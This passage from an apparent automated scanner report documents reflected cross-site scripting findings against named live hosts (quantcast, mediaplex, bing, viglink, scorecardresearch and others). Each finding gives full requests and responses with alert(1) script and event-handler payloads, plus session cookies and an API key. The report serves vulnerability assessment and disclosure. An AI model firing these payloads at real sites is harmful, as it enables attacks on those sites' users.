The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2add5"><a>fbd859f2a29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js2add5"><a>fbd859f2a29/concat.js?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:09 GMT
Connection: close
Content-Length: 7728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js2add5"><a>fbd859f2a29 concat.js" />
...[SNIP]...

3.75. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3131a"><a>e5ef3186019 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js3131a"><a>e5ef3186019?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:46 GMT
Connection: close
Content-Length: 7728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js3131a"><a>e5ef3186019" />
...[SNIP]...

3.76. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2acf5'-alert(1)-'ccdeba3161e was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value ends up in the href attribute of an anchor inside a single-quoted JavaScript string, so the '-alert(1)-' form executes as JavaScript arithmetic on the concatenated string literals without needing a statement terminator; both the JavaScript string context and the HTML attribute context must be encoded.

Request

GET /ad/js/1551-48114-17349-5?mpt=67211952acf5'-alert(1)-'ccdeba3161e&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/y%3B239410357%3B0-0%3B0%3B55854648%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D453725%3Bcontx%3Dent%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 574
Date: Thu, 21 Apr 2011 01:31:29 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af0/3/0/*/y;239410357;0-0;0;55854648;4307-300/250;35536982/35554800/1;u=,cm-58091420_1303349057,11f8f328940989e,ent,ax.20
...[SNIP]...
f8f328940989e,ent,ax.20-cm.ent_l;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=453725;contx=ent;an=20;dc=w;btg=cm.ent_l;~aopt=3/1/e5/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=67211952acf5'-alert(1)-'ccdeba3161e">
...[SNIP]...

3.77. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e28bb'%3balert(1)//984896bc26f was submitted in the mpvc parameter. This input was echoed as e28bb';alert(1)//984896bc26f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=6721195&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/y%3B239410357%3B0-0%3B0%3B55854648%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D453725%3Bcontx%3Dent%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3fe28bb'%3balert(1)//984896bc26f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 574
Date: Thu, 21 Apr 2011 01:31:43 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af0/3/0/*/y;239410357;0-0;0;55854648;4307-300/250;35536982/35554800/1;u=,cm-58091420_1303349057,11f8f328940989e,ent,ax.20-cm.ent_l;~okv=;net=cm;u=,cm-58091420_1303349057,11f8f328940989e,ent,ax.20-cm.ent_l;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=453725;contx=ent;an=20;dc=w;btg=cm.ent_l;~aopt=3/1/e5/0;~sscs=?e28bb';alert(1)//984896bc26fhttp://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=6721195">
...[SNIP]...

3.78. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfcec'%3balert(1)//57906781b29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfcec';alert(1)//57906781b29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=6721195&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/y%3B239410357%3B0-0%3B0%3B55854648%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-58091420_1303349057%2C11f8f328940989e%2Cent%2Cax.20-cm.ent_l%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D453725%3Bcontx%3Dent%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f&bfcec'%3balert(1)//57906781b29=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 577
Date: Thu, 21 Apr 2011 01:32:25 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af0/3/0/*/y;239410357;0-0;0;55854648;4307-300/250;35536982/35554800/1;u=,cm-58091420_1303349057,11f8f328940989e,ent,ax.20-cm.ent_l;~okv=;net=cm;u=,cm-58091420_1303349057,11f8f328940989e,ent,ax.20-cm.ent_l;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=453725;contx=ent;an=20;dc=w;btg=cm.ent_l;~aopt=3/1/e5/0;~sscs=?&bfcec';alert(1)//57906781b29=1http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=6721195">
...[SNIP]...

3.79. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f6ce7<script>alert(1)</script>1f053237914 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.soccernews.com%2Fblatter-wants-stable-fifa%2F72998%2F&callback=_ate.cbs.sc_httpwwwsoccernewscomblatterwantsstablefifa72998f6ce7<script>alert(1)</script>1f053237914 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303122295.1FE|1303122295.60|1303122322.66; dt=X; uid=4dab4fa85facd099; psc=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Thu, 21 Apr 2011 01:28:25 GMT
Content-Length: 115
Connection: close

_ate.cbs.sc_httpwwwsoccernewscomblatterwantsstablefifa72998f6ce7<script>alert(1)</script>1f053237914({"shares":0});

3.80. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload acb7b<img%20src%3da%20onerror%3dalert(1)>a736eb9518c was submitted in the q parameter. This input was echoed as acb7b<img src=a onerror=alert(1)>a736eb9518c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIH&q=acb7b<img%20src%3da%20onerror%3dalert(1)>a736eb9518c HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 6a828c6d806f46b4821695af4181d82d
Date: Sat, 26 Feb 2011 00:17:05 GMT
Connection: close

{"AS":{"Query":"acb7b<img src=a onerror=alert(1)>a736eb9518c","FullResults":1}}

3.81. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload d6834<script>alert(1)</script>ee62c95d5e5 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatad6834<script>alert(1)</script>ee62c95d5e5&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 19 Apr 2011 16:08:54 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 581
Connection: keep-alive

dj.module.ad.bio.loadBizoDatad6834<script>alert(1)</script>ee62c95d5e5({"bizographics":{"industry":[{"code":"construction_commercial_building","name":"Construction Commercial Bldg","parent_code":"construction"},{"code":"real_estate","name":"Real Estate"},{"code":"constru
...[SNIP]...

3.82. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 866fd<script>alert(1)</script>f41244c96de was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun866fd<script>alert(1)</script>f41244c96de HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 19 Apr 2011 16:09:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun866fd<script>alert(1)</script>f41244c96de)

3.83. http://api.tinker.com/event_timeline/213260.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tinker.com
Path:   /event_timeline/213260.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 25223<script>alert(1)</script>57e3cb30f91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event_timeline/213260.json?page=1&rpp=1&videos=1&vidheight=100%&vidwidth=100%&callback=jsonp130334919356525223<script>alert(1)</script>57e3cb30f91&_=1303349195898 HTTP/1.1
Host: api.tinker.com
Proxy-Connection: keep-alive
Referer: http://www4.tinker.com/standard/widget_sm.html?widgetId=1660&eventId=213260&interactionBox=none&baseStyle=white&bgImage=&bgColor=DC0876&paneBgColor=&fontColor=ffffff&linkColor=&brandLogo=&showTitle=&shareLink=&bottomInfo=&roundCorners=&hashTag=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Content-Type: application/json;charset=utf-8
Content-Length: 137
X-Varnish: 809868331
Expires: Thu, 21 Apr 2011 01:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:39:02 GMT
Connection: close

jsonp130334919356525223<script>alert(1)</script>57e3cb30f91({"category":"Event Timeline","madefresh":"Apr 20 2011 06:39:02","items":[]});

3.84. http://api.viglink.com/api/install.js [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/install.js

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7e51"%3balert(1)//0d39877c240 was submitted in the key parameter. This input was echoed as d7e51";alert(1)//0d39877c240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/install.js?key=30c9962c288b6104d8aabe237d132b54d7e51"%3balert(1)//0d39877c240 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.viglink.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 18 Apr 2011 23:51:20 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6719
Connection: keep-alive


var vglnkbmklt = function() {
var notice = {
addCSS: function() {
if(document.getElementById('vglnkbmkltcss')) return;
var props = '\
border: 3px solid #ccc;\
backg
...[SNIP]...
nk != "undefined") {
notice.quick("VigLink is already installed on this page.");
return;
}

window.vglnk = {
api_url: "//api.viglink.com/api",
key: "30c9962c288b6104d8aabe237d132b54d7e51";alert(1)//0d39877c240"
};

var is_ssl = location.protocol == "https://";
var host = (is_ssl ? "https://" : "http://") + "api.viglink.com";

var lib_el = document.createElement('script');
lib_el.src = host + "/api
...[SNIP]...

3.85. http://api.viglink.com/api/ping [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 47797<script>alert(1)</script>11f76ed4d6d was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=30c9962c288b6104d8aabe237d132b5447797<script>alert(1)</script>11f76ed4d6d&loc=about%3Ablank&v=1&jsonp=vglnk_jsonp_13031707108430 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.viglink.com

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 18 Apr 2011 23:51:41 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 97
Connection: keep-alive

error: Unknown api key: 30c9962c288b6104d8aabe237d132b5447797<script>alert(1)</script>11f76ed4d6d

3.86. http://areacode.org/803 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://areacode.org
Path:   /803

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc32c'><script>alert(1)</script>e07cbbd8d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /803?cc32c'><script>alert(1)</script>e07cbbd8d60=1 HTTP/1.1
Host: areacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 01:58:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11022745;expires=Mon, 18-Feb-2041 01:58:39 GMT;path=/
Set-Cookie: CFTOKEN=61649987;expires=Mon, 18-Feb-2041 01:58:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   
...[SNIP]...
<input id="page_link" name="page_link" type="text" class="text_field" value='http://areacode.org/803?cc32c'><script>alert(1)</script>e07cbbd8d60=1'>
...[SNIP]...

3.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f9253<script>alert(1)</script>3482ae0b770 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2f9253<script>alert(1)</script>3482ae0b770&c2=6036378&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2f9253<script>alert(1)</script>3482ae0b770", c2:"6036378", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 5595a<script>alert(1)</script>2c9f434fa62 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=5595a<script>alert(1)</script>2c9f434fa62 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
